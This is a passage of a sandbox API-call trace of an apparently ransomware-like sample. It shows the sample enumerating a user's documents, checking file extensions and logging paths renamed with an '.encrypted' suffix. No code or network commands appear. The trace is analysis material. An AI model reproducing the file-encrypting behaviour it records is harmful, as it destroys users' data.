lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4b364200, ftCreationTime.dwHighDateTime=0x1d5c063, ftLastAccessTime.dwLowDateTime=0x8e9b3a70, ftLastAccessTime.dwHighDateTime=0x1d5bff8, ftLastWriteTime.dwLowDateTime=0x148b6de0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x158e5, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="NC9n Uj.csv", cAlternateFileName="NC9NUJ~1.CSV")) returned 0 [0034.670] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0034.670] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.670] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0034.670] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0034.670] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0034.670] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0034.670] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0034.671] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0034.671] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0034.671] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0034.671] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0034.671] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0034.671] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0034.671] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0034.671] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0034.671] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0034.671] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0034.671] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0034.671] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0034.671] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0034.671] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".csv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0034.671] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0034.671] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0034.671] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0034.671] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0034.671] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0034.671] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0034.671] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0034.671] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0034.671] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0034.671] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0034.671] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0034.671] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0034.671] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0034.671] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0034.671] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0034.671] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0034.672] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0034.672] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0034.672] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0034.672] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0034.672] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0034.672] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0034.672] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x945010 [0034.672] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0034.672] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0034.672] ReadFile (in: hFile=0x128, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6aee3c*=0x16a0, lpOverlapped=0x0) returned 1 [0034.672] ReadFile (in: hFile=0x128, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0034.672] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x16a0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0034.672] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0034.672] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0034.672] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x945010 | out: hHeap=0x770000) returned 1 [0034.672] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0034.672] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0034.672] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\NC9n Uj.encrypted.csv\r\n", cchWideChar=125, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 125 [0034.672] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x7d) returned 0x7d5b30 [0034.672] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\NC9n Uj.encrypted.csv\r\n", cchWideChar=125, lpMultiByteStr=0x7d5b30, cbMultiByte=125, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\NC9n Uj.encrypted.csv\r\n", lpUsedDefaultChar=0x0) returned 125 [0034.672] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0034.673] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5c40 [0034.673] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0034.673] WriteFile (in: hFile=0x128, lpBuffer=0x7d5c40*, nNumberOfBytesToWrite=0x7c, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x7d5c40*, lpNumberOfBytesWritten=0x6aee3c*=0x7c, lpOverlapped=0x0) returned 1 [0034.673] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5c40 | out: hHeap=0x770000) returned 1 [0034.673] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0034.673] CloseHandle (hObject=0x128) returned 1 [0034.673] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0034.674] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0034.674] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x935008 | out: hHeap=0x770000) returned 1 [0034.674] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0034.674] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0034.674] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0034.674] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0034.674] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0034.674] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c95d0 | out: hHeap=0x770000) returned 1 [0034.674] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0034.674] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0034.674] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0034.674] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0034.674] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0034.674] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0034.674] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0034.674] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0034.674] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0034.674] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0034.674] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0034.674] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0034.674] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0034.674] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0034.674] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0034.674] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0034.674] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0034.674] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0034.674] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0034.674] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0034.674] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0034.674] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0034.674] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0034.674] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0034.674] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0034.674] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0034.675] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0034.675] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0034.675] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0034.675] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0034.675] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0034.675] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0034.675] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0034.675] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0034.675] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0034.675] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0034.675] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0034.675] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0034.675] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0034.675] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0034.675] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0034.675] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0034.675] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0034.675] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0034.675] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0034.675] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0034.675] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0034.675] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0034.675] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0034.675] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0034.675] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0034.675] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0034.675] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0034.675] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0034.675] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0034.675] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0034.675] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0034.675] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af5b8 [0034.675] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0034.675] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0034.675] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0034.676] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0034.676] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0034.676] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0034.676] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0034.676] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889628 [0034.676] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0034.676] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0034.676] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0034.676] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0034.676] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0034.676] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0034.676] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0034.676] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0034.676] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0034.676] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0034.676] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0034.676] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0034.676] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0034.676] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0034.676] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0034.676] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0034.676] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0034.676] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0034.676] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0034.676] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0034.676] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0034.676] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0034.676] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0034.676] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0034.676] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0034.676] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0034.677] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0034.677] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0034.677] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0034.677] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0034.677] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0034.677] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0034.677] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0034.677] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0034.677] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0034.677] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0034.677] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0034.677] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0034.677] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0034.677] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0034.677] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0034.677] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0034.677] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0034.677] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0034.677] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0034.677] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0034.677] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0034.677] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0034.677] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0034.677] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0034.677] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0034.677] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0034.677] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0034.677] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0034.677] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0034.677] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0034.677] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0034.677] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0034.678] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0034.678] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0034.678] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0034.678] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0034.678] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0034.678] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0034.678] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0034.678] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0034.678] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0034.678] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0034.678] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0034.678] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0034.678] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0034.678] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0034.678] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0034.678] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0034.678] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0034.678] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0034.678] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0034.678] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0034.678] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0034.678] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0034.678] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5c40 [0034.678] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0034.678] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0034.678] RtlAllocateHeap 